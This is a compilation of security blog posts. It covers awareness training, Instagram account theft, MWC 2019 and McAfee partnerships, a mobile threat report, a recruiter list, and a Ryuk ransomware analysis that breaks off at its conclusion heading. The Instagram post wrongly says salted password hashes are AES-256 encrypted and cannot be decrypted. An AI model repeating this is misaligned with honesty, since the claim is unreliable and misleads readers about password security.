With regards to safety, as internationalization progresses, crime also gains internationalization and diversification, crisis awareness rises not only in companies but also in homes, and it takes a reasonable cost to acquire safety, such as the introduction of home security has been recognized.

On the other hand, how about cyber security? The deeper penetration of the Internet access, from the enterprise, at home and while being mobile, the evolution of information equipment such as smartphones and tablets, the diversification of communication means such as email, SMS, MMS and instant messaging apps, and the rapidly increasing number of users utilizing ICT tools. However, the crisis regarding information theft is more of a subconscious one.

There are two major reasons why it is directly not conscious. First of all, the lack of awareness of cyber risk. While users enjoy convenience, they do not have the opportunity to know the actual condition of risks, so the status quo of the lack of understanding about the risk remains. The second point is about beliefs. Feelings such as I do not care about myself and I’m using antivirus software, so I am OK will lower the awareness of security.

Both lack of recognition for cyber risk and wrong belief are problems of literacy that covers cybersecurity. In other words, it is important to understand correctly including risks and how to disseminate it correctly and avoid harm altogether.

Increase cyber security literacy

Due to sophistication and diversification of attack methods, it is currently impossible to perfectly prevent cyber attacks. In order to suppress the damage caused by the cyber attack, it is necessary to take security measures by the system and to raise the literacy against cybersecurity and raise the awareness of the users’ crisis.

In order to raise literacy, a user utilizing a computing device needs to master correct knowledge on cyber risk and learn how to respond. Training is also important for establishing its knowledge and countermeasures. The methods will be described below:

Creation and strong enforcement of Cybersecurity Policy

Before improving the literacy of employees, it is important to formulate information security policies in the organization. The security policy also describes the information security policy and action guidelines in enterprises, and basic ideas such as what kinds of threats to protect and what kind of information assets to protect. To clarify the purpose and contents of cybersecurity is important as motivation and goal of improvement of literacy among employees.

Implementation of Cyber ​​Security Education

Although the introduction of the antivirus software listed as the most security measure corresponds to known attacks, it can not cover unknown attacks and human errors. Companies are encouraged to conduct training such as basic of cyber risk and cyber attack cases to all employees. Employees are the frontliners for IT security, and some organizations forget to instill such principle to their teams.

Training and more importantly, retraining programs need to exist

Currently, training while employees not being aware of it is being conducted in many companies. In this training, the use of pseudo suspicious emails with the use of a method to confirm the degree of penetration of employee’s security awareness, one example is checking if an employee will open a dummy ‘phishing’ email. This training, which simulates actual situations, is effective in raising the experience value, but it only serves as a reminder to risks. It is also important to learn a lesson from the simulation, to be aware how to respond by making cross-sectional training of post-response from the past. A simulated cyber attack is also known as penetration testing.

There is a possibility that everyone will experience a cyber attack in varying scale, it is “the new normal” in today’s world. In order to minimize the damage caused by cyber attacks as a company, it is ultimately necessary to raise literacy for each and every employee’s cybersecurity awareness. From the usual point of view, how to protect yourself from cyber risk, as a company, is to empower all the employees to maintain calmness, awareness and most important critical thinking: “Did boss really sent this email containing attachment.x?” Asking a question is safer than clicking or opening a questionable attachment or link. Skepticism helps strengthen cybersecurity.

The post Top 3 Cybersecurity Measures: Skepticism, Awareness and Training appeared first on .

Instagram User? Ways To Prevent From Falling For Account Theft

Just like other social media platforms before it like Twitter and Facebook, Instagram (which is also a Facebook property) has experienced massive growth of its user base for the last 3 years. Instagram app used to be an iOS exclusive, but as it opened its doors to Android, it exploded to a whole new level, becoming a rival not only of Twitter but also of its mother company, Facebook. The unfortunate scenario of becoming a very popular app means that it will attract the attention of a typical Android/iOS user, but also by those that desire to “profit” from big data in not so good reason: the hacker community.

But before we start our discussion of Instagram when it comes to its cybersecurity readiness, we need to lay-out the foundation first, for all intents and purposes, an account “getting hacked” is a misnomer. Yes, a misnomer as the correct term is “stolen.” A popular app such as Instagram has a state-of-the-art user database system that keeps usernames and passwords in a secure salted hash format. The possibility of this salted hash information to be converted back to usernames and passwords by the hacker using clever reverse-engineering is impractical. The encryption standard of AES-256bit is too strong and too complex for even the super computers of today to bruteforce decrypt in a reasonable amount of time. No hacker will wait for 25, 50 or 75 years for the bruteforce decryption to complete.

When a user claims that his account was hacked, whether it is a Facebook, Twitter or Instagram account, the most probable is he became a victim of a phishing attempt. Phishing are messages sent by an attacker to the target user in an attempt to steal enough information for the attacker to ‘pretend’ to be the user. This maybe in the form of stealing the user credential using a malicious form, a keylogger infection or by forwarding the user to a legitimately looking website similar to a genuine web service site.

Of course, the more popular the user is in Instagram (or any social media platform for that matter), the bigger chance troublesome individuals in the platform will target him. At first, friendly exchange of pleasantries may occur, until the attacker gains the trust of the target user. It now becomes easier for the attacker to redirect his target to any phishing link or malicious website, as trust has been established. A healthy level of skepticism on whom to trust online should be practiced by not only a popular personality in social media, but of everyone.

One of the best practices, when it comes to social media interaction is establishing a social media page for personal and business/professional use. This way, the contacts will be stored separately, with business/professional contacts not included in the “notifications” when a content that is categorized as “personal” is posted by the user. This is also a great filter to keep personal contacts from learning about your professional/business contents. The professional page can also be locked-down to just be viewable by the user’s professional/business contacts, filtering-out people that are just “curious.” It is imperative not to let 3rd parties be given a small window of opportunity to take-over your social media account, take control of your own security. As an added bonus, all mainstream social media platforms offer two-factor authentication. A 1-time code will be sent to the user’s registered mobile number, and it is needed to completely logged-in to the account. This adds a strong layer of security over just plain password login.

The post Instagram User? Ways To Prevent From Falling For Account Theft appeared first on .

What MWC 2019 Shows Us About the Future of Connectivity

The time has come to say goodbye to Barcelona as we wrap up our time here at Mobile World Congress (MWC). Although it’s hard to believe that the show is already over, MWC 2019 managed to deliver a slew of showstoppers that captured our attention. Here are some of my main takeaways from the event:

Foldable Phones Are the Future

 MWC is an opportunity for telecommunications companies, chipmakers, and smartphone firms to show off their latest and greatest innovations, and they sure delivered this year. One particular device that had the show floor buzzing was the Huawei Mate X, a 5G-enabled smartphone that folds out to become an 8-inch tablet. Additionally, Samsung revealed its plans to hold a press event in early April for its foldable smartphone, the Galaxy Fold. Unlike Huawei’s Mate X, the Galaxy Fold bends so that it encloses like a book. Although neither of these devices are available at to the public yet, they’ve definitely made a bold statement when it comes to smartphone design.

Smart Home Technology Goes Mobile

 Google is one company taking advantage of smartphone enhancements by putting its Google Assistant into the Android texting app. Assistant for Android Messages allows slices of Google search results to be laid out for users based on their text messages. For example, if one user texted another asking to grab some lunch, a bubble would pop up authorizing Assistant to share suggestions for nearby restaurant locations. While Assistant for Android currently only works for movies and restaurants, we can imagine how this technology could expand to other facets of consumer lives. This addition also demonstrates how AI is slowly but surely making its way onto almost every high-end phone through its apps and other tools.

Enhancing the Gaming Experience with 5G, VR, and AR

Not to be shown up, gaming developers also made a statement by using 5G technology to bring gamers into a more immersed gaming environment. Mobile game developer Niantic, creator of Pokémon Go and the upcoming Harry Potter: Wizards Uniteapp, is already working on games that will require a 5G upgrade. One such prototype the company showcased, codenamed Neon, allows multiple people in the same place to play an augmented reality (AR) game at the same time. Each players’ phone shows them the game’s graphics superimposed on the real world and allows the players to shoot each other, duck and dodge, and pick up virtual items, all in real-time.

Niantic wasn’t the only one looking to expand the gaming experience with the help of 5G. At the Intel and Nokia booths, Sony set up an Oculus Rift VR game inspired by Marvel and Sony’s upcoming film Spider-Man: Far From Home. Thanks to the low latency and real-time responsiveness of 5G, one player in the Nokia booth was able to race the other player in the Intel booth as if they were swinging through spiderwebs in Manhattan. Players were able to experience how the next-generation of wireless technology will allow them to participate in a highly immersive gaming experience.

Bringing 4G and 5G to the Automotive Industry

Gaming isn’t the only industry that’s getting a facelift from 5G. At the show, Qualcomm announced two new additions to their automotive platform: the Qualcomm Snapdragon Automotive 4G and 5G Platforms. One of the main features of these platforms is vehicle-to-everything communication, or C-V2X, which allows a car to communicate with other vehicles on the road, roadside infrastructure, and more. In addition, the platforms offer a high-precision, multi-frequency global navigation satellite system, which will help enable self-driving implementations. The platforms also include features like multi-gigabit cloud connectivity, high bandwidth low latency teleoperations support, and precise positioning for lane-level navigation accuracy. These advancements in connectivity will potentially help future vehicles to improve safety, communications, and overall in-car experience for consumers.

Securing Consumers On-the-Go

The advancements in mobile connectivity have already made a huge impact on consumer lifestyles, especially given the widespread adoption of IoT devices and smart gadgets. But the rise in popularity of these devices has also caught the interest of malicious actors looking to access users’ networks. According to our latest Mobile Threat Report, cybercriminals look to trusted devices to gain access to other devices on the user’s home network. For example, McAfee researchers recently discovered a vulnerability within a Mr. Coffee brand coffee maker that could allow a malicious actor to access the user’s home network. In addition, they also uncovered a new vulnerability within BoxLock smart padlocks that could enable cybercriminals to unlock the devices within a matter of seconds.

And while consumers must take necessary security steps to combat vulnerabilities such as these, we at McAfee are also doing our part of help users everywhere remain secure. For instance, we’ve recently extended our partnerships with both Samsung and Türk Telekom in order to overcome some of these cybersecurity challenges. Together, we’re working to secure consumers from cyberthreats on Samsung Galaxy S10 smartphones and provide McAfee Safe Family protection for Türk Telekom’s fixed and mobile broadband customers.

While the likes of 5G, bendable smartphones, and VR took this year’s tradeshow by storm, it’s important for consumers to keep the cybersecurity implications of these advancements in mind. As the sun sets on our time here in Barcelona, we will keep working to safeguard every aspect of the consumer lifestyle so they can embrace improvements in mobile connectivity with confidence.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post What MWC 2019 Shows Us About the Future of Connectivity appeared first on McAfee Blogs.

McAfee Partners With Telefónica To Help Secure Consumers Worldwide

These days, cyberattacks can feel relentless. Due to the interconnected nature of the world we live in, cybercriminals have managed to infiltrate our personal devices, our networks, and even our homes. That’s why we at McAfee believe it’s important now more than ever to secure every facet of the modern consumer lifestyle. And we’ve partnered with Telefónica to do just that.

This partnership first began back in February of last year, when ElevenPaths, Telefónica Cyber Security Unit, and McAfee announced we’re working together to reinforce the online security of Telefónica’s broadband and mobile customers across multiple markets. This partnership covers Europe and Latin America with plans to progressively roll out solutions in the different countries where Telefónica operates. It’s the first time a telecommunications company has delivered a security service to all of its customers, regardless of where they connect from. Fast forward to present day, and this partnership has only expanded. The global product developed by Telefónica and powered by McAfee was first launched in Spain as Movistar Conexión Segura, a service that protects home and mobile customers’ connectivity. Telefónica protects Fusión customers’ home connections with a smart router, thanks to the ElevenPaths solution powered by McAfee Secure Home Platform, which enables seamless security and easy activation. Conexión Segura is also available for Movistar mobile customers, including network protection and one license of Seguridad Dispositivo, a multi-device security protection. Only a few weeks after Spain, Movistar Argentina launched the solution for its fixed and mobile customers. These services help realize Telefónica’s “Security by Default” strategy, offering customers a more robust security solution that protects against threats like viruses, malware, phishing, and emerging IoT threats.

Telefónica and McAfee’s 360 partnership is dedicated to protecting the productivity of consumers everywhere. “This agreement gives customers current and contextual information on their cybersecurity status so they can stay connected with confidence,” said Pedro Pablo Pérez, Global Security VP of Telefónica and CEO of ElevenPaths, Telefónica Cybersecurity Unit.

ElevenPaths and Mcafee’s joint vision to create a more secure tomorrow brings us a step closer to stopping widespread cyberattacks. By joining forces to implement more robust security solutions around the world, we can ensure that our connectivity goes undisrupted. Because together is power.

To learn more about consumer security and our approach to it, be sure to follow us at @ElevenPaths and @McAfee.

The post McAfee Partners With Telefónica To Help Secure Consumers Worldwide appeared first on McAfee Blogs.

Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report

These days, we seem to have a newfound reliance on all things ‘smart.’ We give these devices the keys to our digital lives, entrusting them with tons of personal information. In fact, we are so eager to adopt this technology that we connect 4,800 devices per minute to the internet with no sign of slowing down.  This is largely because smart devices make our lives easier and enjoyable. But even though these devices are convenient, it’s important to understand they’re also convenient for cybercriminals, given they contain a treasure trove of personal data. To examine how exactly these hackers plan on capturing that data, we at McAfee have taken a deep dive into the mobile threat landscape in this year’s Mobile Threat Report. In this report, we examine some of the most significant threat trends, including new spyware, mobile malware, and IoT attack surfaces. Let’s take a look at these trends and how you can keep all your devices protected.

Operations RedDawn and FoulGoal

In our 2018 report, we predicted that attacks targeted toward mobile devices would increase, and everything from fake Fortnite apps to increased mobile malware has proven this to be true. However, two recent discoveries, Operation RedDawn and FoulGoal, prove just how targeted these attacks can really get. RedDawn, in particular, has set its sights on North Korean refugees, as the spyware attempts to copy photos, contacts, SMS messages, and other personal data belonging to the victim.

The latter attack, FoulGoal, actually occurred during last year’s World Cup, as the campaign used an app called Golden Cup to install spyware on victims’ devices. This app promised users live streams of games from the Russian 2018 FIFA World Cup, as well as a searchable database of previous World Cup records. In addition to stealing the user’s phone number, device details, and installed packages, FoulGoal also downloaded spyware to expand its infection into SMS messages, contacts, GPS details, and audio recordings.

A Virtual Backdoor

Our smartphones are now like remote controls for our smart homes, controlling everything from lights to locks to kitchen appliances. So, it was only a matter of time before cybercriminals looked for ways to trick users into leaving open a virtual backdoor. Enter TimpDoor, an Android-based malware family that does just that. First appearing in March 2018, it quickly became the leading mobile backdoor family, as it runs a SMiShing campaign that tricks users into downloading fake voice-messaging apps.

These virtual backdoors are now an ever-growing threat as hackers begin to take advantage of the always-connected nature of mobile phones and other connected devices. Once distributed as Trojanized apps through apps stores, like Google Play, these backdoors can come disguised as add-on games or customization tools. And while most are removed fairly quickly from app stores, hackers can still pivot their distribution efforts and leverage popular websites to conceive a socially engineered attack to trick users into enabling unknown sources.

The Voice Heard Around the Home

Around the world, there are already over 25 million voice assistants, or smart speakers, in use. From simple queries to controlling other IoT gadgets throughout the home, these devices play a big role in our living environments. But many of these IoT devices fail to pass even the most basic security practices, and have easily guessable passwords, notable buffer overflow issues, and unpatched vulnerabilities. This makes voice assistants an increasingly valuable and potentially profitable attack vector for cybercrime.

For a typical voice assistant in the home, the attack surface is quite broad. Cybercriminals could gain access to the microphone or listening stream, and then monitor everything said. Additionally, they could command the speakers to perform actions via other speaker devices, such as embedding commands in a TV program or internet video. Crooks could even alter customized actions to somehow aid their malicious schemes. However, some of the most pressing vulnerabilities can come from associated IoT devices, such as smart plugs, door locks, cameras, or connected appliances, which can have their own flaws and could provide unrestrained access to the rest of the home network.

The good news? We at McAfee are working tirelessly to evolve our home and mobile solutions to keep you protected from any current and future threats. Plus, there are quite a few steps you can personally take to secure your devices. Start by following these tips:

  • Delete apps at the first sign of suspicious activity. If an app requests access to anything outside of its service, or didn’t originate from a trusted source, remove it immediately from your device.
  • Protect your devices by protecting your home network. While we continue to embrace the idea of “smart homes” and connected devices, we also need to embrace the idea that with great connectivity, comes great responsibility to secure those connections. Consider built-in network security, which can automatically secure your connected devices at the router-level.
  • Keep your security software up-to-date. Whether it’s an antivirus solution or a comprehensive security suite, always keep your security solutions up-to-date. Software and firmware patches are ever-evolving and are made to combat newly discovered threats, so be sure to update every time you’re prompted to. Better yet, flip on automatic updates.
  • Change your device’s factory security settings. When it comes to products, many manufacturers don’t think “security first.” That means your device can be potentially vulnerable as soon as you open the box. By changing the factory settings you’re instantly upping your smart device’s security.

Interested in learning more about IoT and mobile security trends and information? Follow @McAfee_Home on Twitter, and ‘Like” us on Facebook.

The post Open Backdoors and Voice Assistant Attacks: Key Takeaways from the 2019 Mobile Threat Report appeared first on McAfee Blogs.

Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships

We’ve touched down in Barcelona for Mobile World Congress 2019 (MWC), which is looking to stretch the limits of mobile technology with new advancements made possible by the likes of IoT and 5G. This year, we are excited to announce the unveiling of our 2019 Mobile Threat Report, our extended partnership with Samsung to protect Galaxy S10 smartphones, and our strengthened partnership with Türk Telekom to provide a security solution to protect families online.

Mobile Connectivity and the Evolving Threat Landscape

These days, it’s a rare occurrence to enter a home that isn’t utilizing smart technology. Devices like smart TVs, voice assistants, and security cameras make our lives more convenient and connected. However, as consumers adopt this technology into their everyday lives, cybercriminals find new ways to exploit these devices for malicious activity. With an evolving threat landscape, cybercriminals are shifting their tactics in response to changes in the market. As we revealed in our latest Mobile Threat Report, malicious actors look for ways to maximize their profit, primarily through gaining control of trusted IoT devices like voice assistants. There are over 25 million voice assistants in use across the globe and many of these devices are connected to other things like thermostats, door locks, and smart plugs. With this increase in connectivity, cybercriminals have more opportunities to exploit users’ devices for malicious purposes. Additionally, cybercriminals are leveraging users’ reliance on their mobile phones to mine for cryptocurrency without the device owner’s knowledge. According to our Mobile Threat Report, cybersecurity researchers found more than 600 malicious cryptocurrency apps spread across 20 different app stores. In order to protect users during this time of rapid IoT and mobile growth, we here at McAfee are pushing to deliver solutions for relevant, real-world security challenges with the help of our partners.

Growing Partnerships to Protect What Matters

Some cybersecurity challenges we are working to overcome include threats like mobile malware and unsecured Wi-Fi. This year, we’ve extended our long-standing partnership with Samsung to help secure consumers from cyberthreats on Samsung Galaxy S10 smartphones. McAfee is also supporting Samsung Secure Wi-Fi service by providing backend infrastructure to protect consumers from risky Wi-Fi. In addition to mobile, this partnership also expands to help protect Samsung smart TVs, PCs, and laptops.

We’ve also strengthened our partnership with Türk Telekom, Turkey’s largest fixed broadband ISP. Last year, we announced this partnership to deliver cross-device security protection. This year, we’re providing a security solution to help parents protect their family’s digital lives. Powered by McAfee Safe Family, Türk Telekom’s fixed and mobile broadband customers will have the option to benefit from robust parental controls. These controls will allow parents to better manage their children’s online experience and give them greater peace of mind.

We’re excited to see what’s to come for the rest of MWC, and how these announcements will help improve consumers’ digital experiences. It is our hope that by continuing to extend our relationships with technology innovators, we can help champion built-in security across devices and networks.

To stay on top of McAfee’s MWC news and the latest consumer and mobile security threats, be sure to follow @McAfee_Home on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post Kicking Off MWC 2019 with Insights on Mobile Security and Growing Partnerships appeared first on McAfee Blogs.

Best Cybersecurity Search Firms & Recruiters 2019

As cybersecurity is becoming more and more popular each day it’s also important to mention that there is a shortage of skilled people within the industry. Many recruiters create specific cybersecurity departments so they can stay competitive and fill the gap. According to the Forbes, it is expected that cybersecurity market will hit $170 billion by 2020 and cybersecurity jobs are expected to reach 6 million by the end of 2019. It’s not a secret that the rapid growth rate of the industry requires a professional approach from some of the best infosec recruiters.

In a recent interview, Karla Jobling from BeecherMadden (a top UK cybersecurity recruiter) reveals that at first cybersecurity companies wanted to hire as many people as possible. However, now they are more concentrated on how to find not many, but just the right people for the right position. It is extremely important for a recruiter to match the candidate’s expectations with the requirement and the corporate culture of the client company.

List of best cybersecurity search firms for 2019

Shield Security Recruiters

Shield Security Recruiters
A leading global recruiting firm focuses in the Cyber Security industry in USA, Europe, APAC and LATAM.
Sheild Security Recruiters have the global expertise and knowledge to bring you the quality Cyber Security candidates you deserve, expect and need.

3P&T Security Recruiting3P&T Security Recruiting

3P&T has been sucessfull in recruiting people in various areas of cybersecurity. They are one of the best cybersecurity recruiters in the area of Seattle, USA. A great UK-based company which is extremly trusted among the infosec professionals in Europe They are always ready to provide expert advices to their clients.

Alta Associates

Adeptis Group

Alta Associates is based in New Jersey, USA and performs custom searches for the most senior level executive roles in the cyber industry. They also deal with risk management, privacy, compliance and governance.

AcuminAcumin Consulting

The company is based in London, but they operate internationally with a special focus on cybersecurity and risk management recruitment.They specialize in providing key infosec and law enforcement skills across all sectors.

Blackmere ConsultingBlackmere Consulting

This company is focusing on quality, speed and cost effectiveness to provide a more specialized approach to source the best talents in cybersecurity. Their services include direct hire, consulting or hiring on a contract for a specific project.

Caliber Security PartnersCaliber Security Partners

They specialty is recruiting and staff augmentation in the short or the long term. They establish trusting relationships with their clients to identify their true neeeds of talent. Another good addition to our cybersecurity search firms list.

Computer FuturesComputer Futures

The company provides a platform both for companies to look for potential talents and for people who are looking for a career in the cybersecurity industry as well. They have a dedicated team of cyber security and business risk that provides individiual solutions.

Cyber ExecCyber Exec

Cyber Exec is headquartered in the Houston, Texas, but operates internationally also in cities like Tokyo or London for example. They definitely know how to find the best C-level employeees.

CISORecruiterCISORecruiter

As the name suggests this company are a team of professionals that will take care of your needs and provide you with the right people for your cybersec company.

Cyber Security Recruiters

This company is among the best cybersecurity search firms in the state of Minnesota, USA and is in bussiness since 2009.

Cyber 360 Inc.

Another top cybersecurity recruiters that work together with some of the biggest cybersecurity leaders and their teams to hire skilled information security professionals.

InfoSec PeopleInfosec People

The company was launched in 2008 and is currently one of the leaders on the cybersecurity recruitment companies in the UK. You can easily find a role, find people or find an advice on their website.

KnownFourKnownFour

Another UK company with owners that has been into international recruiting services for more than 20 years. Their information security department works closely with the experts to provide the perfect solution to their clients.

Redbud Cyber Security

Redbud has a national reach in the USA and is looking to source all kind of positions from Analysts or Engineers to CISOs. They are well known within the industry and can provide some of the best cyber talents.

Security Recruiter

The firm serves clients globally in the fields of information security, corporate security, risk management, governance, compliance and business intelligence.

This was our latest list of cybersecurity search firms. We hope that you will find what you need. Feel free to contact us if you want to add a company to our list.

The post Best Cybersecurity Search Firms & Recruiters 2019 appeared first on CyberDB.

Ryuk, Exploring the Human Connection

In collaboration with Bill Siegel and Alex Holdtman from Coveware.

 

At the beginning of 2019, McAfee ATR published an article describing how the hasty attribution of Ryuk ransomware to North Korea was missing the point. Since then, collective industry peers discovered additional technical details on Ryuk’s inner workings, the overlap between Ryuk and Hermes2.1, and a detailed description of how the ransomware is piggybacking the infamous and ever evolving Trickbot as a primary attack vector. In this blog post we have teamed up with Coveware to take a closer look at the adversary and victim dynamics of Ryuk Ransomware. We structured our research using the Diamond threat model and challenged our existing hypotheses with fresh insights.

Introduction to The Diamond Model

Within Cyber Threat intelligence research, a popular approach is to model the characteristics of an attack using The Diamond Model of Intrusion Analysis. This model relates four basic elements of an intrusion: adversary, capabilities, infrastructure and victim.

For the Ryuk case described above the model can be applied as follows: “An Adversary, cyber-criminal(s), have a capability (Ryuk Ransomware) that is being spread via a TrickBot infection Infrastructure targeting specific victims.

Diamond model of Intrusion Analysis

The Diamond Model offers a holistic view of an intrusion that is a helpful guideline to shape the direction of intelligence research. By searching for relationships between two elements one can gather new evidence. For instance, by analyzing and reverse engineering a piece of malware one might uncover that a certain server is being used for command and control infrastructure, thus linking capability with infrastructure (as shown below).

Linking Infrastructure and Capability

Alternatively, one might search underground forums to find information on adversaries who sell certain pieces of malware, thus linking an adversary with a capability. For instance, finding the underground forum advertisement of Hermes2.1.

Linking Adversary and Capability

Analysis of Competing Hypotheses

In our earlier publication we explained The Analysis of Competing Hypotheses (ACH), the process of challenging formed hypotheses with research findings.
By following this method, we concluded that the strongest hypothesis is not the one with the most verifying evidence, but the one with the least falsifying evidence.

In order to construct a hypothesis with the least falsifying evidence we welcome research published by our industry peers to dissimilate insights that challenge our hypotheses. When we combined all the evidence with links on the diamond model, we discovered that one essential link wasn’t made, the link between adversary and victim.

Seeking New Insights Between Adversary and Victim

Despite published research, the direct link between adversary and victim remained relatively unexplored. Unlike most cybercrime, ransomware and digital extortion frequently creates a strong social connection between adversary and victim. The adversary has certain needs and views the victim as the means to fulfill those needs. The connection between an adversary and victim often generates valuable insights, especially in cases where (extensive) negotiation take place.

Luckily, one of our NoMoreRansom partners, Coveware, is specialized in ransomware negotiations and has gained valuable insights help us link adversary and victim.

The social connection between Adversary and Victim

Ransom Amounts and Negotiations

By aggregating ransomware negotiation and payment data, Coveware is able to identify strain-specific ransomware trends. With regards to Ryuk, it should be noted that ransom amounts average more than 10x the average, making it the costliest type of ransomware. Coveware also observed that some Ryuk ransoms were highly negotiable, while others were not. The bar-belled negotiation results generated an average ransom payment of $71k, a 60% discount from an average opening ask of $145k.

The bar-belled negotiation outcomes meant that some victims were stonewalled. These victims either lost their data or took on staggering financial risk to pay the ransom. The outcomes also imply that in certain cases the adversary would rather receive infrequent large windfalls (often in excess of 100BTC), while in other cases the adversary was keen to monetize every attack and accept lower amounts to ensure payment. This difference in modus operandi suggests that more than one cyber-criminal group is operating Ryuk ransomware.

Ransom Note and Negotiation Similarities and Differences

Similarities between Bitpaymer and Ryuk ransom notes have been observed before. While it is not uncommon for ransom notes to share similar language, sequences of phrases tend to remain within the same ransomware family. Slight copy+paste modifications are made to the ransom text as a variant is passed along to different groups, but large alterations are rarely made. Below is a comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right).

A comparison of a Bitpaymer initial email (left) and a standard Ryuk initial email (right)

The shared language implies that text once unique to a Bitpaymer campaign was borrowed for a Ryuk campaign, possibly by an operator running simultaneous ransom campaigns of both Bitpaymer and Ryuk or the imitation can be considered as the sincerest form of flattery.

Different Initial Email Response May Be Different Adversaries?

A more dramatic scripted communication difference has been observed in the initial email response from Ryuk adversaries. The initial email response is typically identical within ransomware families belonging to the same campaign. When significant differences in length, language, and initial ransom amount appear in the initial email response we are comfortable assuming they belong to unique groups with unique modus operandi. This would mean that Ryuk in being spread by more than one actor group.

Below are two such Ryuk examples:

 

Post Payment Bitcoin Activity

A final indicator that multiple groups are running simultaneous Ryuk campaigns can be observed in the activity of bitcoin after it hits a ransom address. Surprisingly, despite the differences between negotiation outcome and initial communications, Coveware observed little difference between the BTC wallets (blacked out to protect victims) associated with the above cases. Initial comparison showed no meaningful discrepancy in difference between the time of a ransom payment and the time of a corresponding withdraw. Additionally, the distribution of funds upon withdrawal was consistently split between two addresses. Coveware will continue to monitor the funds associated with campaigns for meaningful indicators.

Ryuk Negotiating Profiles

With few exceptions, the rest of the email replies during a Ryuk extortion negotiation are extremely short and blunt. Typical replies and retorts are generally less than 10 written words and often just a single number if the ransom amount is the point of discussion. This correspondence is unique to Ryuk.

One reply did contain quite a remarkable expression; “à la guerre comme à la guerre,” to contextualize the methods and reasons for the cyber criminals’ attacks on western companies. The French expression originates from the seventeenth century and literally translates to “in war as in war” and loosely translates to: “In Harsh times one has to do with what’s available”. The striking thing about this expression is that is prominently featured in volume 30 of the collected works of the Soviet Revolutionary leader Vladimir Lenin. Lenin uses the expression to describe the struggle of his people during the war against western capitalism.

This concept of “The capitalistic West versus the Poor east” is actually something McAfee ATR sees quite often expressed by cyber criminals from some of the Post-Soviet republics. This expression may be a clear indicator of the origin and cultural view of the criminals behind Ryuk.

Ryuk poses existential risk to certain industries

Even though the average ransom discounts of Ryuk are large (~60%), the absolute level of the ransom is extreme. Accordingly, we have seen evidence that links ransom demands to the size of the network footprint of the victim company. However, this doesn’t mean that the ransom demand correlates to the victims actual operational and financial size.

Companies in the IT Hosting and the Freight and Logistics industries have been particularly susceptible to this discrepancy. Coveware has assisted at least 3 companies that have had to unwind their business when an affordable ransom amount, could not be reached. Typically, downtime costs are 10x the ransom amount, but in these industries downtime costs can be particularly extreme.

IT Hosting companies are of note as the size and number of their servers can make them appear like a large organization. Unfortunately, the business of hosting involves high fixed costs, low operating margins, and zero tolerance of downtime by end clients.  Hosting companies that get attacked typically have a few hours to restore service before their clients drop them for alternatives. Moreover, these companies suffer irreparable harm to their reputations, and may trigger SLA breaches that leave them exposed to liability.  The inability to pay a six-figure ransom has caused multiple hosting companies to shut down.

Freight and Logistics firms are also acutely exposed. These firms also present like larger firms given the volume of data they move and their network footprint. Additionally, attacks against Freight and Logistics firms can cause immediate supply chain issues for the victims’ end clients, who are subsequently forced to route through other service providers. Similar to IT Hosting, Freight and Logistics firms have low operating margins and end clients with little tolerance for service interruptions. The inability to pay or negotiate a large ransom has materially impacted several firms in this industry.

Ryuk Decryptor findings and issues

When victims do pay the exorbitant ransom amount, the criminals will provide a decryptor to unlock a their files. This decryptor is actually framework that needs to be loaded with a victim’s private RSA key, provided by the criminals, in order to decrypt. Ensuring that the provided decryptor will only work for this specific victim. This setup allows the criminals to quickly load a victim’s key in the framework and offer a custom decryptor with minimal code change while the underlaying framework remains the same.

From Coveware’s experience we have learned that the decryption process is quite cumbersome and full of possible fatal errors. Luckily Coveware was able to share the Ryuk decryptor with McAfee ATR in order to take a closer look at the issues and level of sophistication of the decryptor.

Once launched the first thing the decryptor does is to search the HKEY_CURRENT_USER Hive for a value pair named “svchos” in the path “SOFTWARE\Microsoft\Windows\CurrentVersion\Run” and delete the specific entry. This removes the persistence of the malware. Afterwards it will reboot the system and remove any remaining Ryuk malware still receding on the system.

Deleting the “svchos” value from the registry.

Once rebooted the user needs to run the tool again and the decryptor will provide two options to decrypt.

  • Decryption per file
  • Automatic decryption

The main interface of the Ryuk decryptor with the different menu options.

HERMES File Marker

During the decryption process we have found that the decryptor searches for the known file marker string HERMES which is located in the encrypted file.

The HERMES marker clearly visible within the file

The fact that Ryuk ransomware adds HERMES filemarker string was already known, but discovering this specific check routine in the decryptor strengthens the hypotheses that Ryuk is a slightly modified version of Hermes2.1 ransomware kit that is sold online even more.

Decryptor Issues

While examining the decryptor we were astonished by the lack of sophistication and the amount of errors that resided within the code. Some of the most prominent issues were:

  • If there is a space in the Windows file path the decryptor will fail the decryption process.
  • If there is a quotation mark (“) in the file path the decryptor will report an error that it cannot find the specific file.
  • The decryptor uses the “GetVersionExW” function to determine the windows version, from Windows 8.1. the value returned by this API has changed and the decryptor isn’t designed to handle this value.
  • The decryptor doesn’t remove the .RYUK extension and replace it with the original extension. So, there is no way the name of the file can give an indication towards the type of the file, something that can be extremely labor intensive for enterprise victims.
  • When choosing the manual option in the decryptor, the user has to supply a path of the specific file or choose “0” to finish. However, choosing a “0” will put the decryptor into an infinite loop.

Looking at the decryptor, it is very worrisome to see that the criminals behind Ryuk can get away with such bad programming. It shows a clear lack of empathy towards their victims and the absence of solid coding skills. Victims who do pay the exorbitant ransom demand are far from in the clear. The decryptor offered by the criminals has a very high risk of malfunctioning, resulting in permanent damage to their precious files. Victims should always make an exact copy of the encrypted hard disk before trying to use the decryptor.

Call to action in piecing the different parts together

By combining all the fresh insights with the information that was already discovered by ourselves and industry peers we can start defining our leading hypotheses around Ryuk. Based on this hypothesis, we will actively look for falsifying evidence. We encourage the security community to participate in this process. We realize that only by collaboration can we piece the different parts of the Ryuk puzzle together.

By now it should be without question that involvement of the DPRK is the least likely hypothesis. Our leading Hypothesis on Ryuk until proven otherwise is;

Ryuk is a direct descendant from Hermes2.1 with slight modifications, based on the code overlap in the ransomware as well as the decryptor. Ryuk is not designed to be used in a largescale corporate environment, based on all the scalability issues in the decryptor. At this moment there are several actors or actor-groups spreading Ryuk, based on the extortion modus operandi and different communications with the victims. The actors or actor-groups behind Ryuk have a relationship with one of the Post-Soviet republics, based on the Russian found in one of the encrypted files and the cultural references observed in the negotiations. The actors behind Ryuk most likely have an affiliation or relationship with the actors behind Trickbot and, based on their TTP, are better skilled at exploitation and lateral movement than pure Ransomware development.

Conclusion

